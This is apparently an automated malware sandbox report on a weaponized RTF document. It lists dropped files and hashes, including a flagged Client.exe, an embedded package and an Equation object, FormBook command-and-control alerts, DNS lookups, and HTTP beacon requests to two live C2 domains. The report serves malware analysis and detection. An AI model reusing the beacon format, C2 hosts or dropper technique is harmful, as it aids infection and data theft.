                                                Preview:......................>...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................]...\........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5E27A50A-FBC0-4F18-B35D-48F0F2347081}.tmp

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1024
                                                Entropy (8bit):0.05390218305374581
                                                Encrypted:false
                                                SSDEEP:3:ol3lYdn:4Wn
                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FD7AAECA-23CD-402D-9C50-48A29A5112A1}.tmp

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1024
                                                Entropy (8bit):1.1722028273607172
                                                Encrypted:false
                                                SSDEEP:6:beKNc1ElClXiKNgREqAWlgFJYm7KmrRmvlw5Fr+ur8FrK:beOc1MClXiOk5uFJd5Rmvq5ZP8ZK
                                                MD5:75FCAEF5B6C0ADE6AF66F49874853C6A
                                                SHA1:834FA72EEF104773D7052895798FED035EF01594
                                                SHA-256:01E456476480AA1FD27ACF8F02AEA30D9B09581579A029154A6CD2A6850C85A0
                                                SHA-512:5E7DBBEB9534660466B7ACD9E70725504C33CC435C08D30ECE035B7CC13F5DC8AAB73F8CA16AA562697063059FEC3C5EE8258F108EB68C8B1071DD381FEDB99A
                                                Malicious:false
                                                Preview:..).(.).(.).(.).(.).(.).5.=....... .P.a.c.k.a.g.e.E.M.B.E.D.5.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D..........................................................................................................................................................................................................................................................................................................................................................................................................................................."...<...>...@...F............................................................................................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J.....j....CJ..OJ..QJ..U..^J...<..CJ..OJ..QJ..^J...OJ..QJ..^J.

                                                C:\Users\user\AppData\Local\Temp\Client.exe

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):954368
                                                Entropy (8bit):7.255862647028007
                                                Encrypted:false
                                                SSDEEP:12288:f24dTkV9VXtdGI1HNDT5wQjG6EXPGc/16/PxuepSxmwCD8ik:hs9RauHN/5wa8/L9UueAxmfHk
                                                MD5:B4F00BB75BFD5C4E2C9D0CD6070E8E54
                                                SHA1:EE56EAF9288D5315D51E23C32CD8B11CEFA15E2F
                                                SHA-256:40A539EBB55B0A6A2F1529A733EAF3AA1C48CE467EAEAAA56C851ABF9BDA3006
                                                SHA-512:8CBC3FCF0AD0B985BBA9D489278FB4E8A40F56561B1FFDE8EB8D79EB9E29C0BC224123B209844EB4E3CD758BCBF0FF17FDCAD98D44E7E602F42D6DA2D0541F5C
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 24%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b.........."...0..|...............@... ....@.. ....................... ............@.....................................K....................................................................................................@..H...........5++..8$ ..... ......................@....text....y...@...z.................. ..`.rsrc...............................@..@.................................... ..`.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\Client.exe:Zone.Identifier

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:gAWY3n:qY3n
                                                MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                Malicious:true
                                                Preview:[ZoneTransfer]..ZoneId=3..

                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.LNK

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 9 00:38:02 2022, mtime=Tue Aug 9 00:38:02 2022, atime=Tue Aug 9 00:38:12 2022, length=2870044, window=hide
                                                Category:dropped
                                                Size (bytes):1199
                                                Entropy (8bit):4.599606484788339
                                                Encrypted:false
                                                SSDEEP:24:8BA/XTRKJive0lNHCn9DJeAHCn9tDv3qm1u7D:8BA/XT0iflNHCnJJbHCnmg0D
                                                MD5:FB70B386249D4133C4BAB75CDA40C2F0
                                                SHA1:6EA10AEB53EB1DA991622FD5A9D03AB1A3E989F3
                                                SHA-256:099321B7080DB54AF4916A8A2E456643BAC0B512835E3F3DDFD91125804F3321
                                                SHA-512:F2B59A978A17D42544839F66970F24A64B65EC2EA6F3C7223E12D2413F0D12E56818A272FFAED073173CCB2A9582901018AE6438FEDCB64C26CFB7DD68C27EF8
                                                Malicious:false
                                                Preview:L..................F.... ...................-.......+..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1......U....Desktop.d......QK.X.U..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2...+..U.. .SECURI~1.RTF..........U...U..*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...R.t.f...O.b.f.u.s.c.a.t.e.d...3.2...1.9.0.5...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\980108\Users.user\Desktop\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf.J.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...R.t.f...O.b.f.u.s.c.a.t.e.d...3.2...1.9.0.5...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S

                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):146
                                                Entropy (8bit):4.9658261704362445
                                                Encrypted:false
                                                SSDEEP:3:bDuMJluscbcTLqjQWC0LUZAlmxW9rbcTLqjQWC0LUZAlv:bCVwTeS0LHjrwTeS0LH1
                                                MD5:E9FAD3CF5FB87FFCDE0A5322116B439E
                                                SHA1:3FD3EC2D5452FE415C4FB88E3A4362C4F9717D71
                                                SHA-256:811BCE8DBC32271417CC1D639AE63C548BF7641ED1CF3F64531213A332A0C4D5
                                                SHA-512:B49BFBC8009820B9C8B209C7D112A55F1CC30C44D49B14CC1EC748EB1A6AAAB2C588F77E8D38E5475B7E67748E8EE43F8E610800953D1A495B24060144278469
                                                Malicious:false
                                                Preview:[folders]..Templates.LNK=0..SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.LNK=0..[misc]..SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.LNK=0..

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.503835550707525
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
                                                MD5:7CFA404FD881AF8DF49EA584FE153C61
                                                SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
                                                SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
                                                SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
                                                Malicious:false
                                                Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...

                                                C:\Users\user\Desktop\~$curiteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.503835550707525
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
                                                MD5:7CFA404FD881AF8DF49EA584FE153C61
                                                SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
                                                SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
                                                SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
                                                Malicious:false
                                                Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...

                                                Static File Info

                                                General

                                                File type:Rich Text Format data, version 1, unknown character set
                                                Entropy (8bit):4.770913997735828
                                                TrID:
                                                • Rich Text Format (5005/1) 55.56%
                                                • Rich Text Format (4004/1) 44.44%
                                                File name:SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf
                                                File size:2870044
                                                MD5:8bfea104ae681494896379e3c647f6ae
                                                SHA1:aaf97d8a987c5060ff06c4031030000d53d3cb31
                                                SHA256:2975edb12c8e70b56a89c7fb82e4eb347b992b4147dcfa2a20efd16d54c33eb4
                                                SHA512:4803dad9f9afaec9270e2d831de98152fa7307e86114f2d03b950e5486495f7bba97cb0752e13be9ac99756942c219975082b6b6f7877f8e4e3f15bd8403dc9d
                                                SSDEEP:24576:999sNt+S9dUJrMbKlvqr/OwJJZ5ic4Uez5NwoQu37WBQ3a95HX:Y
                                                TLSH:CCD5A570B1B535C6E26F0172429FBC59521738C3B3C62D88815DEAF62ED4B7A7B41A0E
                                                File Content Preview:{\rtf1{\*\pnseclvl3\pndec\pnstart1\pnindent720\pnhang {\pntxta .}}{\*\pnseclvl4\pnlcltr\pnstart1\pnindent720\pnhang {\pntxta )}}{\*\pnseclvl5\pndec\pnstart1\pnindent720\pnhang {\pntxtb (}{\pntxta )}}{\*\pnseclvl6.\pnlcltr\pnstart1\pnindent720\pnhang {\pnt

                                                File Icon

                                                Icon Hash:e4eea2aaa4b4b4a4

                                                Static RTF Info

                                                Objects

                                                IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                0000012A7h2embeddedPackage954535Client.exeC:\Path\Client.exeC:\Path\Client.exeno
                                                1001DC2BCh2embeddedEquation.33072no

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                192.168.2.2266.235.200.17049171802031449 08/08/22-18:39:45.738853TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.2266.235.200.170
                                                192.168.2.22104.167.67.17549172802031449 08/08/22-18:40:04.832440TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917280192.168.2.22104.167.67.175
                                                192.168.2.2266.235.200.17049171802031453 08/08/22-18:39:45.738853TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.2266.235.200.170
                                                192.168.2.22104.167.67.17549172802031453 08/08/22-18:40:04.832440TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917280192.168.2.22104.167.67.175
                                                192.168.2.2266.235.200.17049171802031412 08/08/22-18:39:45.738853TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.2266.235.200.170
                                                192.168.2.22104.167.67.17549172802031412 08/08/22-18:40:04.832440TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917280192.168.2.22104.167.67.175

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 8, 2022 18:39:45.721043110 CEST4917180192.168.2.2266.235.200.170
                                                Aug 8, 2022 18:39:45.738465071 CEST804917166.235.200.170192.168.2.22
                                                Aug 8, 2022 18:39:45.738708019 CEST4917180192.168.2.2266.235.200.170
                                                Aug 8, 2022 18:39:45.738852978 CEST4917180192.168.2.2266.235.200.170
                                                Aug 8, 2022 18:39:45.756073952 CEST804917166.235.200.170192.168.2.22
                                                Aug 8, 2022 18:39:46.209754944 CEST804917166.235.200.170192.168.2.22
                                                Aug 8, 2022 18:39:46.209817886 CEST804917166.235.200.170192.168.2.22
                                                Aug 8, 2022 18:39:46.209853888 CEST804917166.235.200.170192.168.2.22
                                                Aug 8, 2022 18:39:46.209891081 CEST804917166.235.200.170192.168.2.22
                                                Aug 8, 2022 18:39:46.209923983 CEST804917166.235.200.170192.168.2.22
                                                Aug 8, 2022 18:39:46.210068941 CEST4917180192.168.2.2266.235.200.170
                                                Aug 8, 2022 18:39:46.210129976 CEST4917180192.168.2.2266.235.200.170
                                                Aug 8, 2022 18:39:46.210244894 CEST4917180192.168.2.2266.235.200.170
                                                Aug 8, 2022 18:39:46.227530956 CEST804917166.235.200.170192.168.2.22
                                                Aug 8, 2022 18:39:46.227902889 CEST4917180192.168.2.2266.235.200.170
                                                Aug 8, 2022 18:40:04.628437996 CEST4917280192.168.2.22104.167.67.175
                                                Aug 8, 2022 18:40:04.814755917 CEST8049172104.167.67.175192.168.2.22
                                                Aug 8, 2022 18:40:04.814852953 CEST4917280192.168.2.22104.167.67.175
                                                Aug 8, 2022 18:40:04.832439899 CEST4917280192.168.2.22104.167.67.175
                                                Aug 8, 2022 18:40:05.021908045 CEST8049172104.167.67.175192.168.2.22
                                                Aug 8, 2022 18:40:05.021940947 CEST8049172104.167.67.175192.168.2.22
                                                Aug 8, 2022 18:40:05.021955013 CEST8049172104.167.67.175192.168.2.22
                                                Aug 8, 2022 18:40:05.022198915 CEST4917280192.168.2.22104.167.67.175
                                                Aug 8, 2022 18:40:05.048086882 CEST4917280192.168.2.22104.167.67.175
                                                Aug 8, 2022 18:40:05.233951092 CEST8049172104.167.67.175192.168.2.22

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 8, 2022 18:39:45.500391006 CEST5586853192.168.2.228.8.8.8
                                                Aug 8, 2022 18:39:45.673486948 CEST53558688.8.8.8192.168.2.22
                                                Aug 8, 2022 18:40:04.426235914 CEST4968853192.168.2.228.8.8.8
                                                Aug 8, 2022 18:40:04.601803064 CEST53496888.8.8.8192.168.2.22

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Aug 8, 2022 18:39:45.500391006 CEST192.168.2.228.8.8.80xca6dStandard query (0)www.thegoldencamel.onlineA (IP address)IN (0x0001)
                                                Aug 8, 2022 18:40:04.426235914 CEST192.168.2.228.8.8.80x1666Standard query (0)www.best-boy.netA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Aug 8, 2022 18:39:45.673486948 CEST8.8.8.8192.168.2.220xca6dNo error (0)www.thegoldencamel.onlinethegoldencamel.onlineCNAME (Canonical name)IN (0x0001)
                                                Aug 8, 2022 18:39:45.673486948 CEST8.8.8.8192.168.2.220xca6dNo error (0)thegoldencamel.online66.235.200.170A (IP address)IN (0x0001)
                                                Aug 8, 2022 18:40:04.601803064 CEST8.8.8.8192.168.2.220x1666No error (0)www.best-boy.net104.167.67.175A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • www.thegoldencamel.online
                                                • www.best-boy.net

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.224917166.235.200.17080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 18:39:45.738852978 CEST0OUTGET /nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2 HTTP/1.1
                                                Host: www.thegoldencamel.online
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 18:39:46.209754944 CEST2INHTTP/1.1 404 Not Found
                                                Date: Mon, 08 Aug 2022 16:39:46 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                Link: <https://www.thegoldencamel.online/wp-json/>; rel="https://api.w.org/"
                                                Vary: Accept-Encoding
                                                X-Endurance-Cache-Level: 2
                                                X-nginx-cache: WordPress
                                                CF-Cache-Status: MISS
                                                Server: cloudflare
                                                CF-RAY: 7379b09ee927997b-FRA
                                                Data Raw: 31 36 61 33 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 39 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 67 6f 6c 64 65 6e 63 61 6d 65 6c 2e 6f 6e 6c 69 6e 65 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 6e 61 6d 65 22 3a 22 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 67 6f 6c 64 65 6e 63 61 6d 65 6c 2e 6f 6e 6c 69 6e 65 2f 22 2c 22 73 61 6d 65 41 73 22 3a 5b 5d 2c 22 6c 6f 67
                                                Data Ascii: 16a3<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v19.4 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - The Golden Camel</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - The Golden Camel" /><meta property="og:site_name" content="The Golden Camel" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.thegoldencamel.online/#organization","name":"The Golden Camel","url":"https://www.thegoldencamel.online/","sameAs":[],"log
                                                Aug 8, 2022 18:39:46.209817886 CEST3INData Raw: 6f 22 3a 7b 22 40 74 79 70 65 22 3a 22 49 6d 61 67 65 4f 62 6a 65 63 74 22 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 65 6e 2d 55 53 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 67 6f 6c 64 65 6e 63 61 6d 65 6c 2e 6f
                                                Data Ascii: o":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.thegoldencamel.online/#/schema/logo/image/","url":"https://www.thegoldencamel.online/wp-content/uploads/2022/08/cropped-The_Golden_Camel_2.png","contentUrl":"https://www.thegold
                                                Aug 8, 2022 18:39:46.209853888 CEST4INData Raw: 61 79 65 72 5f 61 6a 61 78 75 72 6c 20 3d 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 67 6f 6c 64 65 6e 63 61 6d 65 6c 2e 6f 6e 6c 69 6e 65 2f 77 70 2d 61 64 6d 69 6e 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 3f 22 3b 0a 76 61 72 20 70
                                                Data Ascii: ayer_ajaxurl = "https://www.thegoldencamel.online/wp-admin/admin-ajax.php?";var pagelayer_global_nonce = "7e9fbd5cb7";var pagelayer_server_time = 1659976786;var pagelayer_is_live = "";var pagelayer_facebook_id = "";var pagelayer_settings
                                                Aug 8, 2022 18:39:46.209891081 CEST6INData Raw: 2d 61 63 63 65 6e 74 3a 23 36 31 63 65 37 30 3b 2d 2d 70 61 67 65 6c 61 79 65 72 2d 66 6f 6e 74 2d 70 72 69 6d 61 72 79 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4f 70 65 6e 20 53 61 6e 73 3b 2d 2d 70 61 67 65 6c 61 79 65 72 2d 66 6f 6e 74 2d 73 65
                                                Data Ascii: -accent:#61ce70;--pagelayer-font-primary-font-family:Open Sans;--pagelayer-font-secondary-font-family:Roboto;--pagelayer-font-text-font-family:Montserrat;--pagelayer-font-accent-font-family:Poppins;}.pagelayer-row-stretch-auto > .pagelayer-ro
                                                Aug 8, 2022 18:39:46.209923983 CEST7INData Raw: 68 74 3a 31 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 66 66 7d 0a 62 6f 64 79 2e 70 61 67 65 6c 61 79 65 72 2d 62 6f 64 79 20 68 33 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 55 62 75 6e 74 75 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 35 70 78 3b 66 6f 6e
                                                Data Ascii: ht:1;color:#000000ff}body.pagelayer-body h3{font-family:Ubuntu;font-size:35px;font-weight:500;text-transform:uppercase;line-height:1;color:#000000ff}body.pagelayer-body h4{font-family:Ubuntu;font-size:28px;font-weight:400;text-transform:uppe


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.2249172104.167.67.17580C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 18:40:04.832439899 CEST8OUTGET /nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2 HTTP/1.1
                                                Host: www.best-boy.net
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 18:40:05.021908045 CEST9INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Mon, 08 Aug 2022 16:40:01 GMT
                                                Content-Type: text/html
                                                Content-Length: 2158
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 b3 b2 ba fe bd d8 c9 ce b9 a4 b3 cc d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 2c 26 23 34 39 3b 26 23 35 36 3b 26 23 33 31 31 30 35 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 32 31 38 36 36 3b 26 23 32 31 38 36 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 2c 26 23 33 32 37 36 39 3b 26 23 32 33 33 37 36 3b 26 23 32 31 33 32 30 3b 26 23 32 32 38 31 32 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 35 36 3b 26 23 35 36 3b 26 23 35 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 38 31 3b 26 23 32 31 33 34 35 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 2c 26 23 33 30 30 30 37 3b 26 23 32 32 38 39 39 3b 26 23 32 31 38 36 36 3b 26 23 32 38 36 30 38 3b 26 23 32 38 38 37 32 3b 26 23 33 39 36 34 30 3b 26 23 32 38 35 32 36 3b 26 23 32 31 39 34 33 3b 26 23 32 37 37 30 30 3b 26 23 32 31 31 36 30 3b 26 23 32 34 35 37 37 3b 26 23 32 32 32 37 30 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 2c 26 23 34 39 3b 26 23 35 36 3b 26 23 33 31 31 30 35 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 32 31 38 36 36 3b 26 23 32 31 38 36 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 2c 